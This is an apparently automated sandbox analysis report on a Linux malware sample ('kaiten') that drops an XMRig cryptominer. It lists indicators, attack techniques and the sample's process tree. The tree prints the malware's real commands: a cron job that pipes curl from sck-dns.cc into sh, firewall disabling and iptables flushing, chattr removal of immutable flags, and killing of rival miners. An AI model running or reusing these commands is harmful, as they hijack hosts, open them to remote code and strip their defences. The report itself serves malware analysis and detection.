kaiten | f6069886728686c5c6566c0332ba37c16805fb623b6fcbbd1dd2e09ee5cc75b1

description	ioc	Process
File opened for modification	/etc/ld.so.preload	bash

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/2551-1-0x000073c699800000-0x000073c699ebed40-memory.dmp	xmrig

Executes dropped EXE 3 IoCs

ioc	pid	Process
/mnt/-java	2551	-java
/mnt/-sdk	2645	-sdk
/etc/init.d/dpkg-deb-package	2760	dpkg-deb-package

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx
behavioral1/files/fstream-8.dat	upx
behavioral1/files/fstream-12.dat	upx

Attempts to change immutable files 30 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
2546	chattr
2515	chattr
2540	chattr
2652	xargs
2522	chattr
2534	chattr
2541	chattr
2547	chattr
2520	chattr
2647	bash
2764	chattr
3268	chattr
2548	chattr
2549	chattr
2552	sh
2759	chattr
2638	chattr
2538	chattr
2542	chattr
2543	chattr
2638	bash
2544	chattr
2555	hostname
2527	chattr
2531	chattr
2536	chattr
2539	chattr
2518	chattr
2537	chattr
3267	chattr

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

System Checks

execution persistence privilege_escalatio

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	-java
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	-java
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	-java
File opened for reading	/sys/devices/virtual/dmi/id/product_name	-java

Creates/modifies Cron job 1 TTPs 8 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

Cron

persistence privilege_escalation

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.zihISj	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.V04vu5	crontab
File opened for modification	/etc/cron.d/dbus-manager	goku
File opened for modification	/var/spool/cron/dbus-manager	goku
File opened for modification	/etc/cron.hourly/dbus-manager	goku
File opened for modification	/etc/cron.daily/dbus-manager	goku
File opened for modification	/etc/cron.weekly/dbus-manager	goku
File opened for modification	/etc/cron.monthly/dbus-manager	goku

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 2 TTPs 1 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

T1547

RC Scripts

T1037.004

description	ioc	Process
File opened for modification	/etc/init.d/dpkg-deb-package	goku

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/etc/systemd/system/dpkg-deb-package.service	goku

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	-java
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	-java
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	-java
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	-java
File opened for reading	/sys/devices/virtual/dmi/id/product_version	-java
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	-java
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	-java
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	-java
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	-java
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	-java
File opened for reading	/sys/devices/virtual/dmi/id/board_name	-java
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	-java
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	-java
File opened for reading	/sys/devices/virtual/dmi/id/board_version	-java

Writes file to system bin folder 1 IoCs

description	ioc	Process
File opened for modification	/bin/dpkg-debian	goku

Security Software Discovery 1 TTPs 2 IoCs

Adversaries may attempt to discover installed security software and its configurations.

Security Software Discovery

T1518.001

pid	Process
2607	sh
2616	sh

Changes its process name 1 IoCs

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	2890

Checks CPU configuration 1 TTPs 5 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

description	ioc	Process
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	-java

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	-java
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/types	-java
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	-java
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	pkill

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	-java
File opened for reading	/sys/bus/node/devices/node0/meminfo	-java
File opened for reading	/sys/bus/dax/target_node	-java
File opened for reading	/sys/bus/node/devices/node0/access1/initiators	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	-java
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	-java
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	-java
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	-java
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	-java
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	-java
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	-java
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	-java
File opened for reading	/sys/bus/dax/devices/target_node	-java
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	-java
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	-java
File opened for reading	/sys/bus/dax/devices	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/fs/cgroup/cgroup.controllers	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/virtual/dmi/id	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/bus/cpu/devices	-java
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	-java
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	-java
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	-java
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	-java
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill

Process Discovery 1 TTPs 2 IoCs

Adversaries may try to discover information about running processes.

Process Discovery

T1057

pid	Process
2609	ps
2619	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/25/status	ps
File opened for reading	/proc/776/stat	ps
File opened for reading	/proc/14/status	pkill
File opened for reading	/proc/199/ctty	pkill
File opened for reading	/proc/1811/status	pkill
File opened for reading	/proc/2004/stat	pkill
File opened for reading	/proc/188/ctty	pkill
File opened for reading	/proc/1114/status	pkill
File opened for reading	/proc/196/cmdline	pkill
File opened for reading	/proc/819/cmdline	pkill
File opened for reading	/proc/15/cmdline	pkill
File opened for reading	/proc/755/cgroup	pkill
File opened for reading	/proc/26/ctty	pkill
File opened for reading	/proc/193/cgroup	pkill
File opened for reading	/proc/23/cmdline	pkill
File opened for reading	/proc/1987/status	pkill
File opened for reading	/proc/2713/ctty	pkill
File opened for reading	/proc/2208/stat	pkill
File opened for reading	/proc/197/cgroup	pkill
File opened for reading	/proc/2004/status	pkill
File opened for reading	/proc/776/stat	pkill
File opened for reading	/proc/24/cgroup	pkill
File opened for reading	/proc/44/fd	ss
File opened for reading	/proc/2168/cgroup	pkill
File opened for reading	/proc/1729/cmdline	pkill
File opened for reading	/proc/6/ctty	pkill
File opened for reading	/proc/1694/stat	pkill
File opened for reading	/proc/201/attr/current	ss
File opened for reading	/proc/2447/cmdline	pkill
File opened for reading	/proc/188/cmdline	pkill
File opened for reading	/proc/2004/cgroup	pkill
File opened for reading	/proc/1094/environ	ps
File opened for reading	/proc/2510/ctty	pkill
File opened for reading	/proc/2223/ctty	pkill
File opened for reading	/proc/1968/cmdline	pkill
File opened for reading	/proc/1976/cmdline	pkill
File opened for reading	/proc/190/cmdline	pkill
File opened for reading	/proc/1123/status	ps
File opened for reading	/proc/1977/attr/current	ss
File opened for reading	/proc/52/status	pkill
File opened for reading	/proc/1123/status	pkill
File opened for reading	/proc/18/stat	pkill
File opened for reading	/proc/1969/cgroup	pkill
File opened for reading	/proc/2358/stat	pkill
File opened for reading	/proc/772/stat	pkill
File opened for reading	/proc/8/cgroup	pkill
File opened for reading	/proc/49/ctty	pkill
File opened for reading	/proc/28/ctty	pkill
File opened for reading	/proc/1114/ctty	pkill
File opened for reading	/proc/56/status	pkill
File opened for reading	/proc/2671/ctty	pkill
File opened for reading	/proc/513/ctty	pkill
File opened for reading	/proc/55/stat	pkill
File opened for reading	/proc/1089/status	pkill
File opened for reading	/proc/2149/status	pkill
File opened for reading	/proc/1910/status	pkill
File opened for reading	/proc/1094/cmdline	pkill
File opened for reading	/proc/53/stat	pkill
File opened for reading	/proc/199/cgroup	pkill
File opened for reading	/proc/2174/status	pkill
File opened for reading	/proc/45/status	pkill
File opened for reading	/proc/2149/stat	ss
File opened for reading	/proc/2242/fd	ss
File opened for reading	/proc/63/cmdline	pkill

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

System Network Configuration Discovery

T1016

pid	Process
2654	pgrep
2634	bash
2635	bash
2636	bash
2637	bash
2653	bash

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.lock	-java
File opened for modification	/tmp/.bashirc	-sdk
File opened for modification	/tmp/.bash_profile	goku

/tmp/goku
/tmp/goku
1⤵
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to tmp directory
PID:2510
- /bin/ps
  ps -eo "pid,ppid,comm,%cpu" "--sort=-%cpu"
  2⤵
  - Reads CPU attributes
  PID:2514
- /bin/chattr
  chattr -ia /etc/cron.d/.placeholder
  2⤵
  - Attempts to change immutable files
  PID:2515
- /bin/ss
  ss -n
  2⤵
  PID:2517
- /bin/chattr
  chattr -ia /etc/cron.d/anacron
  2⤵
  - Attempts to change immutable files
  PID:2518
- /bin/chattr
  chattr -ia /etc/cron.d/e2scrub_all
  2⤵
  - Attempts to change immutable files
  PID:2520
- /bin/chattr
  chattr -ia /var/spool/cron/atjobs
  2⤵
  - Attempts to change immutable files
  PID:2522
- /bin/chattr
  chattr -ia /var/spool/cron/atspool
  2⤵
  - Attempts to change immutable files
  PID:2527
- /bin/chattr
  chattr -ia /var/spool/cron/crontabs
  2⤵
  - Attempts to change immutable files
  PID:2531
- /bin/chattr
  chattr -ia /etc/cron.hourly/.placeholder
  2⤵
  - Attempts to change immutable files
  PID:2534
- /bin/chattr
  chattr -ia /etc/cron.daily/.placeholder
  2⤵
  - Attempts to change immutable files
  PID:2536
- /bin/chattr
  chattr -ia /etc/cron.daily/0anacron
  2⤵
  - Attempts to change immutable files
  PID:2537
- /bin/chattr
  chattr -ia /etc/cron.daily/apport
  2⤵
  - Attempts to change immutable files
  PID:2538
- /bin/chattr
  chattr -ia /etc/cron.daily/apt-compat
  2⤵
  - Attempts to change immutable files
  PID:2539
- /bin/chattr
  chattr -ia /etc/cron.daily/dpkg
  2⤵
  - Attempts to change immutable files
  PID:2540
- /bin/chattr
  chattr -ia /etc/cron.daily/man-db
  2⤵
  - Attempts to change immutable files
  PID:2541
- /bin/chattr
  chattr -ia /etc/cron.weekly/.placeholder
  2⤵
  - Attempts to change immutable files
  PID:2542
- /bin/chattr
  chattr -ia /etc/cron.weekly/0anacron
  2⤵
  - Attempts to change immutable files
  PID:2543
- /bin/chattr
  chattr -ia /etc/cron.weekly/man-db
  2⤵
  - Attempts to change immutable files
  PID:2544
- /bin/ss
  ss -ltnp "sport = :49365"
  2⤵
  PID:2545
- /bin/chattr
  chattr -ia /etc/cron.monthly/.placeholder
  2⤵
  - Attempts to change immutable files
  PID:2546
- /bin/chattr
  chattr -ia /etc/cron.monthly/0anacron
  2⤵
  - Attempts to change immutable files
  PID:2547
- /bin/chattr
  chattr -ia /var/spool/cron/atjobs
  2⤵
  - Attempts to change immutable files
  PID:2548
- /bin/chattr
  chattr -ia /var/run/9b0278d4-04d9-4da5-b048-0f48d9f1ce9c
  2⤵
  - Attempts to change immutable files
  PID:2549
- /bin/ss
  ss -ltnp "sport = :3333"
  2⤵
  - Reads runtime system information
  PID:2550
- /mnt/-java
  /mnt/-java -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Writes file to tmp directory
  PID:2551
- - /bin/sh
    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    3⤵
    - Attempts to change immutable files
    PID:2552
  - - /bin/hostname
      hostname -I
      4⤵
      Attempts to change immutable files
      PID:2555
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:2557
  - - /bin/cat
      cat /etc/ssh/sshd_config
      4⤵
      PID:2560
  - - /bin/grep
      grep "Port "
      4⤵
      PID:2561
  - - /bin/head
      head -n 1
      4⤵
      PID:2562
  - - /bin/awk
      awk "{print \"-\"\$2}"
      4⤵
      PID:2563
  - - /bin/whoami
      whoami
      4⤵
      PID:2564
  - - /bin/hostname
      hostname
      4⤵
      PID:2565
  - - /bin/grep
      grep -c "^processor" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:2566
  - - /bin/grep
      grep -m 1 "model name" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:2570
  - - /bin/cut
      cut -d: -f2
      4⤵
      PID:2571
  - - /bin/sed
      sed -e "s/^ *//"
      4⤵
      PID:2572
  - - /bin/sed
      sed -e "s/\$//"
      4⤵
      PID:2573
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:2578
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:2581
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:2584
  - - /bin/awk
      awk "{print \$3}"
      4⤵
      PID:2587
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:2590
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:2593
  - - /bin/awk
      awk "{print \$2\" \"\$3\" \"\$4}"
      4⤵
      PID:2595
- - /bin/sh
    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:2596
  - - /bin/ps
      ps -A "-ostat,ppid"
      4⤵
      Reads CPU attributes
      Enumerates kernel/hardware configuration
      PID:2597
  - - /bin/awk
      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      4⤵
      PID:2598
  - - /bin/id
      id -u
      4⤵
      PID:2601
  - - /bin/ps
      ps x
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2602
  - - /bin/grep
      grep /etc/cron
      4⤵
      PID:2603
  - - /bin/grep
      grep -v grep
      4⤵
      PID:2604
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    - Security Software Discovery
    PID:2607
  - - /bin/id
      id -u
      4⤵
      PID:2608
  - - /bin/ps
      ps aux
      4⤵
      Checks CPU configuration
      Reads CPU attributes
      Process Discovery
      PID:2609
  - - /bin/grep
      grep -v grep
      4⤵
      PID:2610
  - - /bin/grep
      grep -v -- "-bash[[:space:]]*\$"
      4⤵
      PID:2611
  - - /bin/grep
      grep -v /usr/sbin/httpd
      4⤵
      PID:2612
  - - /bin/awk
      awk "{if(\$3>30.0) print \$2}"
      4⤵
      PID:2613
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
    3⤵
    - Security Software Discovery
    PID:2616
  - - /bin/id
      id -u
      4⤵
      PID:2617
  - - /bin/ps
      ps aux
      4⤵
      Checks CPU configuration
      Process Discovery
      PID:2619
  - - /bin/grep
      grep -v grep
      4⤵
      PID:2620
  - - /bin/grep
      grep -- "-bash[[:space:]]*\$"
      4⤵
      PID:2621
  - - /bin/awk
      awk "{if(\$3>30.0) print \$2}"
      4⤵
      PID:2622
  - - /bin/wc
      wc -l
      4⤵
      PID:2623
- /bin/ss
  ss -ltnp "sport = :5555"
  2⤵
  PID:2558
- /bin/bash
  bash -c "echo \"*/2 * * * * /var/run/9b0278d4-04d9-4da5-b048-0f48d9f1ce9c */5 * * * * curl -s http://sck-dns.cc/c|sh \" | crontab -"
  2⤵
  PID:2567
- - /bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:2575
- /bin/ss
  ss -ltnp "sport = :7777"
  2⤵
  - Reads runtime system information
  PID:2600
- /bin/ss
  ss -ltnp "sport = :19999"
  2⤵
  PID:2606
- /bin/ss
  ss -ltnp "sport = :10300"
  2⤵
  - Reads runtime system information
  PID:2615
- /bin/ss
  ss -ltnp "sport = :10343"
  2⤵
  PID:2625
- /bin/ss
  ss -ltnp "sport = :13333"
  2⤵
  PID:2631
- /bin/ss
  ss -ltnp "sport = :15555"
  2⤵
  PID:2632
- /bin/bash
  bash -c "ufw disable"
  2⤵
  PID:2633
- /bin/bash
  bash -c "iptables -P INPUT ACCEPT"
  2⤵
  - System Network Configuration Discovery
  PID:2634
- /bin/bash
  bash -c "iptables -P OUTPUT ACCEPT"
  2⤵
  - System Network Configuration Discovery
  PID:2635
- /bin/bash
  bash -c "iptables -P FORWARD ACCEPT"
  2⤵
  - System Network Configuration Discovery
  PID:2636
- /bin/bash
  bash -c "iptables -F"
  2⤵
  - System Network Configuration Discovery
  PID:2637
- /bin/bash
  bash -c "chattr -ia /etc/ld.so.preload"
  2⤵
  - Attempts to change immutable files
  PID:2638
- /bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:2638
- /bin/bash
  bash -c "cat /dev/null > /etc/ld.so.preload"
  2⤵
  - Modifies the dynamic linker configuration file
  PID:2639
- - /bin/cat
    cat /dev/null
    3⤵
    PID:2640
- /bin/bash
  bash -c "crontab -l | sed '/\\.bashgo\\|pastebin\\|onion\\|bprofr\\|python\\|curl\\|wget\\|\\.sh/d' | crontab -"
  2⤵
  PID:2641
- - /bin/crontab
    crontab -l
    3⤵
    PID:2642
- - /bin/sed
    sed "/\\.bashgo\\|pastebin\\|onion\\|bprofr\\|python\\|curl\\|wget\\|\\.sh/d"
    3⤵
    PID:2643
- - /bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:2644
- /mnt/-sdk
  /mnt/-sdk
  2⤵
  - Executes dropped EXE
  - Writes file to tmp directory
  PID:2645
- /bin/bash
  bash -c "cat /proc/mounts | awk '{print \$2}' | grep -P '/proc/\\d+' | grep -Po '\\d+' | xargs -I % kill -9 %"
  2⤵
  - Attempts to change immutable files
  PID:2647
- - /bin/cat
    cat /proc/mounts
    3⤵
    PID:2648
- - /bin/awk
    awk "{print \$2}"
    3⤵
    PID:2649
- - /bin/grep
    grep -P "/proc/\\d+"
    3⤵
    PID:2650
- - /bin/grep
    grep -Po "\\d+"
    3⤵
    PID:2651
- - /bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:2652
- /bin/bash
  bash -c "pgrep -f 'meshagent|kdevchecker|ipv6_addrconfd|kworkerr|cpuhelp|deamon|ksoftriqd|pastebin|solr.sh|solrd|kinsing|kdevtmpfsi|kthreaddk|linuxsys|rnv2ymcl|skid.x86|getpy.sh|unifiw|kdevtmpfsi|stratum' | xargs -r kill"
  2⤵
  - System Network Configuration Discovery
  PID:2653
- - /bin/xargs
    xargs -r kill
    3⤵
    PID:2655
  - - /bin/kill
      kill 2653
      4⤵
      PID:2658
- - /bin/pgrep
    pgrep -f "meshagent|kdevchecker|ipv6_addrconfd|kworkerr|cpuhelp|deamon|ksoftriqd|pastebin|solr.sh|solrd|kinsing|kdevtmpfsi|kthreaddk|linuxsys|rnv2ymcl|skid.x86|getpy.sh|unifiw|kdevtmpfsi|stratum"
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - System Network Configuration Discovery
    PID:2654
- /bin/ss
  ss -n
  2⤵
  PID:2656
- /bin/ss
  ss -n
  2⤵
  PID:2657
- /bin/ss
  ss -n
  2⤵
  PID:2659
- /bin/pkill
  pkill -9 -f b64decode
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2660
- /bin/ss
  ss -n
  2⤵
  PID:2661
- /bin/ss
  ss -n
  2⤵
  PID:2662
- /bin/ss
  ss -n
  2⤵
  PID:2663
- /bin/ss
  ss -n
  2⤵
  PID:2664
- /bin/pkill
  pkill -9 -f MCf8
  2⤵
  - Reads CPU attributes
  PID:2666
- /bin/pkill
  pkill -9 -f mysqldd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2667
- /bin/pkill
  pkill -9 -f monero
  2⤵
